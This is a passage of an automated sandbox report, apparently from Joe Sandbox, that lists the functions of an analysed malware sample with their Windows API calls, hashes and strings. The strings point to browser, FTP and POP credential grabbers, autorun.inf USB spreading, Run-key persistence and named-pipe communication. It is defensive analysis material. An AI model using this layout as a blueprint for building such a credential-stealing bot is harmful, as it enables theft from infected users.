                                                                  • Instruction ID: 0b51aa73500d7dadcedef1ebff83c5d6c2a860ee5eabf3a50e5a962dfd4ef995
                                                                  • Opcode Fuzzy Hash: 64d7b8244fbfdc1afa4d47cb7060f5ba771a40b01b51bcfd978bc403f22fd462
                                                                  • Instruction Fuzzy Hash: 7F31EAB35403986BD732A7A1BC86FBB336CEB45705F04427AFF099A2C1D6709D1486A5
                                                                  Function 003E0C80 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100memorythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32 ref: 003E0C89
                                                                  • GetModuleFileNameA.KERNEL32(00000000,0041AA28,00000104), ref: 003E0C9F
                                                                  • GetModuleFileNameW.KERNEL32(00000000,0041A710,00000208), ref: 003E0CB0
                                                                  • GetWindowsDirectoryA.KERNEL32(0041AB30,00000104), ref: 003E0CC0
                                                                    • Part of subcall function 003D19F0: wcsrchr.MSVCRT(?,0000005C,?,003D6965,?,?,?), ref: 003D19F9
                                                                  • InitializeCriticalSection.KERNEL32(0041AC34), ref: 003E0CE3
                                                                  • InitializeCriticalSection.KERNEL32(0041B4E4), ref: 003E0CEA
                                                                  • MoveFileExW.KERNEL32(0041A710,00000000,00000004), ref: 003E0DA5
                                                                    • Part of subcall function 003DA150: memset.MSVCRT(?,00000000,00000206,?), ref: 003DA170
                                                                    • Part of subcall function 003DA150: GetWindowsDirectoryW.KERNEL32(?,00000208,?,?,?), ref: 003DA184
                                                                    • Part of subcall function 003DA150: _memicmp.MSVCRT(?,?,00000000,?,00000000,?,?,?), ref: 003DA1C3
                                                                  • SetFileAttributesW.KERNEL32(0041A710,00000080), ref: 003E0D96
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E9F0,00000000,00000000,00000000), ref: 003E0DED
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003E0DF4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: File$CriticalDirectoryInitializeModuleNameSectionWindows$AttributesCloseCreateHandleHeapMoveProcessThread_memicmpmemsetwcsrchr
                                                                  • String ID: %s.%S$brk$ruskill
                                                                  • API String ID: 2870590860-2269373653
                                                                  • Opcode ID: d22853357a2bb9a239e8f1cef5611cc4b6f43c9142a50b94bb1dc212138b57d0
                                                                  • Instruction ID: 2e78a9ac1921c193e5319e523ebe6c311dcbf9479bd37a7e1dc8858157051011
                                                                  • Opcode Fuzzy Hash: d22853357a2bb9a239e8f1cef5611cc4b6f43c9142a50b94bb1dc212138b57d0
                                                                  • Instruction Fuzzy Hash: CB3128357813D0B7D33367A26D4BFDA37A89B00B54F140222F601E92D1D7F4A491875B
                                                                  Function 003DA880 Relevance: 22.6, APIs: 2, Strings: 13, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF), ref: 003DA89E
                                                                    • Part of subcall function 003D7790: memset.MSVCRT(?,00000000,00000103), ref: 003D77AE
                                                                    • Part of subcall function 003D7790: memset.MSVCRT(?,00000000,000001FF,?,00000000,00000103), ref: 003D77C8
                                                                    • Part of subcall function 003D7790: lstrcpyA.KERNEL32(00000000,off), ref: 003D77F0
                                                                    • Part of subcall function 003D7790: _snprintf.MSVCRT(00000000,000001FF,state_%s,?), ref: 003D780D
                                                                    • Part of subcall function 003D7790: lstrlenA.KERNEL32(00000000), ref: 003D7822
                                                                    • Part of subcall function 003D7790: lstrlenA.KERNEL32(00000000), ref: 003D7858
                                                                  • _snprintf.MSVCRT(00000000,000001FF,003E2B10,00000539,httpi,00000001,usbi,00000000,bdns,00000001), ref: 003DA936
                                                                    • Part of subcall function 003D7500: lstrlenA.KERNEL32(?), ref: 003D752B
                                                                    • Part of subcall function 003D7500: _snprintf.MSVCRT(?,000001FF,%s_,?), ref: 003D7547
                                                                    • Part of subcall function 003D7500: _vsnprintf.MSVCRT(?,000001FF,00000000,?), ref: 003D7569
                                                                    • Part of subcall function 003D7500: lstrcmpA.KERNEL32(?,bdns), ref: 003D758B
                                                                    • Part of subcall function 003D7500: StrStrIA.SHLWAPI(?,00000000), ref: 003D759F
                                                                    • Part of subcall function 003D7500: lstrlenA.KERNEL32(?), ref: 003D75B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintfmemset$_vsnprintflstrcmplstrcpy
                                                                  • String ID: bdns$ffgrab$ftpgrab$http$httpi$iegrab$int$msg$msn$msnu$pdef$popgrab$usbi
                                                                  • API String ID: 3955240783-2907616027
                                                                  • Opcode ID: 6ba83768f0b55d604ead61096c6d4135037e6175cd0badda21b470dc3cf6a476
                                                                  • Instruction ID: a4cf55d3f2a2ea91c3ca83e30221de93a6b6186e5156a58b4db5ef39b4babbd2
                                                                  • Opcode Fuzzy Hash: 6ba83768f0b55d604ead61096c6d4135037e6175cd0badda21b470dc3cf6a476
                                                                  • Instruction Fuzzy Hash: 3A115FB9BE93A775E663B6A26CC3FF922194B40F04F400755F1087D2C2BAF12550C166
                                                                  Function 003D17E0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 168stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003D180E
                                                                  • memset.MSVCRT(?,00000000,00000206,?,00000000,00000103), ref: 003D1829
                                                                  • wcsstr.MSVCRT(00000000,003E13F0), ref: 003D1842
                                                                  • lstrcmpA.KERNEL32(00000000,block), ref: 003D1888
                                                                  • strstr.MSVCRT(00000000,003E13D8), ref: 003D1898
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000208), ref: 003D18B7
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000104,00000000,00000000), ref: 003D1905
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememset$lstrcmpstrstrwcsstr
                                                                  • String ID: %s.%S$bdns$block$brk$rdns
                                                                  • API String ID: 695720605-4000218262
                                                                  • Opcode ID: 9963e2cd05c55f07b419160d30b621fdf84b9b5d78b737c8ed0f2706ab9d5c27
                                                                  • Instruction ID: d193794f454b3ba2c796856561971b94640f0664144e8ee808b827d66e23f738
                                                                  • Opcode Fuzzy Hash: 9963e2cd05c55f07b419160d30b621fdf84b9b5d78b737c8ed0f2706ab9d5c27
                                                                  • Instruction Fuzzy Hash: 18511676A00254BBDB22DB55FC56FEB37AC9B95710F04422AF900A62C1E7B0DA45C7E2
                                                                  Function 003D10A0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 102stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003D10C0
                                                                  • lstrcmpW.KERNEL32(?,0041ADA0), ref: 003D10D7
                                                                  • lstrcmpW.KERNEL32(?,0041A710), ref: 003D111D
                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 003D1127
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104,00000000,00000000), ref: 003D1161
                                                                  • lstrcpyA.KERNEL32(003E6D88,00000000), ref: 003D1179
                                                                  • lstrcpyA.KERNEL32(00000000,003E1335), ref: 003D1187
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104,00000000,00000000), ref: 003D11A0
                                                                  • lstrcpyA.KERNEL32(003E6E90,00000000), ref: 003D11B3
                                                                    • Part of subcall function 003D7700: memset.MSVCRT(?,00000000,000001FF), ref: 003D771E
                                                                    • Part of subcall function 003D7700: _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
                                                                    • Part of subcall function 003D7700: lstrlenA.KERNEL32(00000000), ref: 003D7747
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpy$ByteCharMultiWidelstrcmpmemset$FileMove_snprintflstrlen
                                                                  • String ID: %s.%S$pdef$ruskill
                                                                  • API String ID: 1230166232-1410347113
                                                                  • Opcode ID: 9613b678889bf7240efcfa66a3f445c7d47a4bba33136c21d06312e3340ae8d4
                                                                  • Instruction ID: 499aa9c500a3b36d0c8946992fe96e0a89d9a3edfc391df39a97d3b45b8056b8
                                                                  • Opcode Fuzzy Hash: 9613b678889bf7240efcfa66a3f445c7d47a4bba33136c21d06312e3340ae8d4
                                                                  • Instruction Fuzzy Hash: 2531F8B6740368BBE7329755AC82FEA736CDB95B10F000256FB54AA2C1D7F0ED80C665
                                                                  Function 003D73E0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 97stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF), ref: 003D7401
                                                                  • memset.MSVCRT(?,00000000,000001FF,?,00000000,000001FF), ref: 003D7419
                                                                  • lstrlenA.KERNEL32(?), ref: 003D7431
                                                                  • _snprintf.MSVCRT(?,000001FE,%s_,?), ref: 003D7449
                                                                  • _vsnprintf.MSVCRT(?,000001FE,003E0A8E,?), ref: 003D746B
                                                                  • lstrlenA.KERNEL32(?), ref: 003D747A
                                                                  • _memicmp.MSVCRT(?,block,00000004), ref: 003D74B0
                                                                  • _vsnprintf.MSVCRT(?,000001FE,003E0A8E,?), ref: 003D74D0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: _vsnprintflstrlenmemset$_memicmp_snprintf
                                                                  • String ID: %s.%s$%s_$blk$block
                                                                  • API String ID: 3657324510-3589362310
                                                                  • Opcode ID: bd15c963fcb5d3e21bb0a559a50114939e49fd2e52f2edfb6e9a3c463ee44b6a
                                                                  • Instruction ID: 1ac1fb0a4cbb6b3c68503304d4c3ce05e8bde89dc2f058cfd1a51b55fed65e93
                                                                  • Opcode Fuzzy Hash: bd15c963fcb5d3e21bb0a559a50114939e49fd2e52f2edfb6e9a3c463ee44b6a
                                                                  • Instruction Fuzzy Hash: B421327794025D7BE712EA59DC82FFB336CDB84704F4445B9FA08971C1F5709E4586A0
                                                                  Function 003D9580 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 89stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003D95A4
                                                                  • memset.MSVCRT(?,00000000,000007FF), ref: 003D95BE
                                                                  • memset.MSVCRT(?,00000000,00000103,?,00000000,000007FF), ref: 003D95D8
                                                                  • GetTickCount.KERNEL32 ref: 003D95E0
                                                                  • lstrcpyA.KERNEL32(?,Mozilla/4.0), ref: 003D9611
                                                                  • lstrcpyA.KERNEL32(?,GET), ref: 003D9664
                                                                  • sprintf.MSVCRT(?,%s / ?%d HTTP/1.1Host: %sUser-Agent: %sKeep-Alive: 300Connection: keep-aliveContent-Length: 42,?,?,?,?), ref: 003D9685
                                                                  • strtok.MSVCRT(?,003E2960,?,%s / ?%d HTTP/1.1Host: %sUser-Agent: %sKeep-Alive: 300Connection: keep-aliveContent-Length: 42,?,?,?,?), ref: 003D9696
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: memset$lstrcpy$CountTicksprintfstrtok
                                                                  • String ID: %s / ?%d HTTP/1.1Host: %sUser-Agent: %sKeep-Alive: 300Connection: keep-aliveContent-Length: 42$GET$Mozilla/4.0$POST
                                                                  • API String ID: 3318893083-109246470
                                                                  • Opcode ID: cf6dce72a8d604e4193ff0e49373804575b3d4ebc25db8e21539f0a00fb59f72
                                                                  • Instruction ID: e155546091234263bd9d973c1a068e587a5d4d2bce8d9a5a6c63011f5404cecd
                                                                  • Opcode Fuzzy Hash: cf6dce72a8d604e4193ff0e49373804575b3d4ebc25db8e21539f0a00fb59f72
                                                                  • Instruction Fuzzy Hash: BE213CB394026C6AC72AD7A5DC42FDA736C9FA8710F0002D6F308A61C1D6F0ABC48B61
                                                                  Function 003D8270 Relevance: 19.8, APIs: 13, Instructions: 305COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 003D8292
                                                                  • GetTickCount.KERNEL32 ref: 003D82A8
                                                                    • Part of subcall function 003D81C0: WSAStartup.WS2_32(00000202,?), ref: 003D81E3
                                                                  • select.WS2_32(00000000,00000000,?,00000000,?), ref: 003D8314
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Startupselect
                                                                  • String ID:
                                                                  • API String ID: 3882035529-0
                                                                  • Opcode ID: bbbf393a0ce9e7867f753e0a0be6096e767544ff1cc0112dc383b26e13626a15
                                                                  • Instruction ID: cb74252ced52cfcf20321cd10b7fac8ccb64b26d276e80b2b5e47e2c750a3848
                                                                  • Opcode Fuzzy Hash: bbbf393a0ce9e7867f753e0a0be6096e767544ff1cc0112dc383b26e13626a15
                                                                  • Instruction Fuzzy Hash: 44A1D8B2900604ABC735DF69E881AEBB3F9EF45310F00455FE69987341EB74BD858BA1
                                                                  Function 003D6F70 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 125stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FE), ref: 003D6F91
                                                                  • lstrcpyA.KERNEL32(00000000,HKCU\), ref: 003D6FFE
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000400), ref: 003D7017
                                                                  • _wcsnicmp.MSVCRT(?,Software\Microsoft\Windows\CurrentVersion\Run,00000000,Software\Microsoft\Windows\CurrentVersion\Run), ref: 003D7061
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide_wcsnicmplstrcpymemset
                                                                  • String ID: %S%s%s$%s.%s%s$HKCU\$HKLM\$Software\Microsoft\Windows\CurrentVersion\Run$brk$rreg
                                                                  • API String ID: 2911520168-3007424447
                                                                  • Opcode ID: 6e13b4f4884e5c4ba30915d86e5fb5ba8bbc9e1b9047c59211ed14095e876218
                                                                  • Instruction ID: 9ff99ca7312b98e578bb6d9290a9685462b5f6b13f88594a6a7efd1e7c8d5cf5
                                                                  • Opcode Fuzzy Hash: 6e13b4f4884e5c4ba30915d86e5fb5ba8bbc9e1b9047c59211ed14095e876218
                                                                  • Instruction Fuzzy Hash: D441A4B2A40218BBCB11DB95EC42EEE77BCEB58710F04025AF904E62C1F674D95087A5
                                                                  Function 003DE880 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 84pipestringthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003DE8A0
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 003DE8AD
                                                                  • _snprintf.MSVCRT(00000000,00000400,\\.\pipe\%08x_ipc,00000000,30e44aa1,00000000), ref: 003DE8D0
                                                                  • CreateNamedPipeA.KERNEL32(00000000,00000003,00000006,000000FF,00000800,00000800,00001388,00000000), ref: 003DE8FF
                                                                  • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 003DE913
                                                                  • GetLastError.KERNEL32 ref: 003DE91D
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000D7A0,00000000,00000000,00000000), ref: 003DE941
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DE94B
                                                                  • CreateNamedPipeA.KERNEL32(00000000,00000003,00000006,000000FF,00000800,00000800,00001388,00000000), ref: 003DE96E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CreateNamedPipe$CloseConnectErrorHandleLastThread_snprintflstrlenmemset
                                                                  • String ID: 30e44aa1$\\.\pipe\%08x_ipc
                                                                  • API String ID: 4065143564-1096776489
                                                                  • Opcode ID: 659c0b8b4a7ef878524e7979d1f304078170696f029056138cd0a4609e981ea2
                                                                  • Instruction ID: 143eddb63e5bc85f432b57de9d5468973cd75d1d58dd70d0471fecf69cf9c3e3
                                                                  • Opcode Fuzzy Hash: 659c0b8b4a7ef878524e7979d1f304078170696f029056138cd0a4609e981ea2
                                                                  • Instruction Fuzzy Hash: 4F210272BC03257AF33266745C87FAA7A5CAB14F20F644761FB04FE1C0DAF069044AA8
                                                                  Function 003D7100 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 102stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000206), ref: 003D7121
                                                                  • lstrcpyW.KERNEL32(?,HKCU\), ref: 003D7172
                                                                  • _wcsnicmp.MSVCRT(?,Software\Microsoft\Windows\CurrentVersion\Run,00000000,Software\Microsoft\Windows\CurrentVersion\Run), ref: 003D71A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsnicmplstrcpymemset
                                                                  • String ID: %S%S%S$%s.%S%S$HKCU\$HKLM\$Software\Microsoft\Windows\CurrentVersion\Run$brk$rreg
                                                                  • API String ID: 1531173107-4065158899
                                                                  • Opcode ID: 6d801e1912f05fd69a2fb6e4f30cd94c3e4d3fc64c2177a69bdaedefdabd5b1f
                                                                  • Instruction ID: 2314ad9b4b568240370ebe02f0cccffb94680be584ab02e2ef2a175a7488fa9d
                                                                  • Opcode Fuzzy Hash: 6d801e1912f05fd69a2fb6e4f30cd94c3e4d3fc64c2177a69bdaedefdabd5b1f
                                                                  • Instruction Fuzzy Hash: 1C31F677A413647ACB12DE45AC86EEB337CEB98710F000756FD05A2282F6B0ED9086B5
                                                                  Function 003D6940 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 72stringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003D19F0: wcsrchr.MSVCRT(?,0000005C,?,003D6965,?,?,?), ref: 003D19F9
                                                                    • Part of subcall function 003D7700: memset.MSVCRT(?,00000000,000001FF), ref: 003D771E
                                                                    • Part of subcall function 003D7700: _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
                                                                    • Part of subcall function 003D7700: lstrlenA.KERNEL32(00000000), ref: 003D7747
                                                                  • strstr.MSVCRT(003E6E90,.exe,?,?,?,?), ref: 003D69A8
                                                                  • lstrcmpA.KERNEL32(003E6D88,0041AC50,?,?,?,?,?,?), ref: 003D69BE
                                                                  • SetFileAttributesA.KERNEL32(003E6E90,00000080,?,?,?,?,?,?), ref: 003D69D2
                                                                  • DeleteFileA.KERNEL32(003E6E90,?,?,?,?,?,?), ref: 003D69DD
                                                                  • MoveFileExA.KERNEL32(003E6D88,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT),?,?,?,?,?,?), ref: 003D69EC
                                                                    • Part of subcall function 003DA310: memset.MSVCRT ref: 003DA335
                                                                    • Part of subcall function 003DA310: memset.MSVCRT ref: 003DA34F
                                                                    • Part of subcall function 003DA310: memset.MSVCRT(?,00000000,000003FF), ref: 003DA369
                                                                    • Part of subcall function 003DA310: _vsnprintf.MSVCRT(?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA382
                                                                    • Part of subcall function 003DA310: sprintf.MSVCRT(00000000,003E13EC,?,?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA39A
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s,blk,?,?,000001FE,003E0A8E), ref: 003DA3AD
                                                                    • Part of subcall function 003DA310: _snprintf.MSVCRT(?,000003FF,\\.\pipe\%08x_ipc,00000000,30e44aa1,00000000,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s), ref: 003DA3CC
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB), ref: 003DA3DB
                                                                    • Part of subcall function 003DA310: sprintf.MSVCRT(?,%d.,00000000,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB), ref: 003DA3EC
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA3FB
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA404
                                                                    • Part of subcall function 003DA310: EnterCriticalSection.KERNEL32(0041AC34,?,?,00000000), ref: 003DA436
                                                                    • Part of subcall function 003DA310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 003DA452
                                                                    • Part of subcall function 003DA310: LeaveCriticalSection.KERNEL32(0041AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA464
                                                                  Strings
                                                                  • pdef, xrefs: 003D6986
                                                                  • .exe, xrefs: 003D699C
                                                                  • autorun.inf, xrefs: 003D6970
                                                                  • %s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!, xrefs: 003D6A06
                                                                  • %s.Blocked "%S" from creating "%S", xrefs: 003D6A24
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Filememset$CriticalSection_snprintfsprintf$AttributesCreateDeleteEnterLeaveMove_vsnprintflstrcmpstrstrwcsrchr
                                                                  • String ID: %s.Blocked "%S" from creating "%S"$%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!$.exe$autorun.inf$pdef
                                                                  • API String ID: 2285763329-814828592
                                                                  • Opcode ID: e2030dddc11c317dfff728f730d4b57876c02e23b4e2f50e824d95959226057d
                                                                  • Instruction ID: c3958af0b9aca17592deeba6bf6c07debcaa09ba6a987e84bc23d056b579c5d6
                                                                  • Opcode Fuzzy Hash: e2030dddc11c317dfff728f730d4b57876c02e23b4e2f50e824d95959226057d
                                                                  • Instruction Fuzzy Hash: 2011CB7BBC03A032DA2326D63C47FDF32494BA1FA5F054226FD54F53C2DAA1E95041A2
                                                                  Function 003D3C90 Relevance: 16.7, APIs: 11, Instructions: 227filepipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 003D3DA4
                                                                  • ReadFile.KERNEL32(?,-003E7960,00000800,00000000,?,?,?,00000000,000000FF), ref: 003D3DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 003D3E3E
                                                                  • ReadFile.KERNEL32(?,003E7960,00000800,00000000,?), ref: 003D3ED7
                                                                  • GetLastError.KERNEL32 ref: 003D3EE3
                                                                  • GetLastError.KERNEL32 ref: 003D3EEA
                                                                  • GetLastError.KERNEL32 ref: 003D3EF3
                                                                  • DisconnectNamedPipe.KERNEL32(?), ref: 003D3F68
                                                                  • ConnectNamedPipe.KERNEL32(?), ref: 003D3F7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileNamedPipeRead$ConnectDisconnectMultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 4113577031-0
                                                                  • Opcode ID: 2edbaf7844ecdb1393fe1ea98fe36e80b8307205f877c132f39058dd0b12e1e6
                                                                  • Instruction ID: efd401a2cf9efd9dd044f2cd8b8d8ff8372752d231d4431fe7bb97ba6ea69f39
                                                                  • Opcode Fuzzy Hash: 2edbaf7844ecdb1393fe1ea98fe36e80b8307205f877c132f39058dd0b12e1e6
                                                                  • Instruction Fuzzy Hash: 3791C5B6A04219EFD715CF68E8C4FAA77A8FB49304F004269E505DB381D771EE51CBA2
                                                                  Function 003D9080 Relevance: 16.6, APIs: 2, Strings: 9, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000206), ref: 003D90A0
                                                                    • Part of subcall function 003DA0F0: wcsrchr.MSVCRT(?,0000005C,?,?,003DA1D9,?,003D13BF,?,?,?,?,?,00000000,?,?,?), ref: 003DA0FA
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000208), ref: 003D9101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememsetwcsrchr
                                                                  • String ID: %s.Blocked possible browser exploit pack call on URL '%s'$com$exe$firefox.exe$http$iexplore.exe$pdef$pif$scr
                                                                  • API String ID: 519477765-3787805686
                                                                  • Opcode ID: 2de8c3ede32502611203e857e64b1075490a1944d8842823a8f92be982084143
                                                                  • Instruction ID: 4ca16dc86c2892b484f9c7a72177be3e86febc7d1933405d8fdc49914063ff7f
                                                                  • Opcode Fuzzy Hash: 2de8c3ede32502611203e857e64b1075490a1944d8842823a8f92be982084143
                                                                  • Instruction Fuzzy Hash: 0131F4B6E403556BDF22DA51BC0AFEB376C9B10350F054657FC149A382EA71ED60C7A2
                                                                  Function 003DB160 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 69stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(003D6E9C,00000000,00000000,00000000,?,?,003D6E9C), ref: 003DB178
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,003D6E9C), ref: 003DB186
                                                                  • lstrlenA.KERNEL32(003D6E9C,?,?,003D6E9C), ref: 003DB18F
                                                                  • strstr.MSVCRT(00000000,,00000000,003D6E9C,00000000,?,?,003D6E9C), ref: 003DB19F
                                                                  • strstr.MSVCRT(-00000004,003E19DC,?,?,?,003D6E9C), ref: 003DB1B6
                                                                  • lstrlenA.KERNEL32(-00000004,?,?,?,?,?,003D6E9C), ref: 003DB1C3
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,003D6E9C), ref: 003DB1D2
                                                                  • lstrlenA.KERNEL32(-00000004,?,?,?,?,?,003D6E9C), ref: 003DB1DC
                                                                  • lstrcpynA.KERNEL32(00000000,-00000004,00000001,?,?,?,?,?,003D6E9C), ref: 003DB1E5
                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,003D6E9C), ref: 003DB1F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
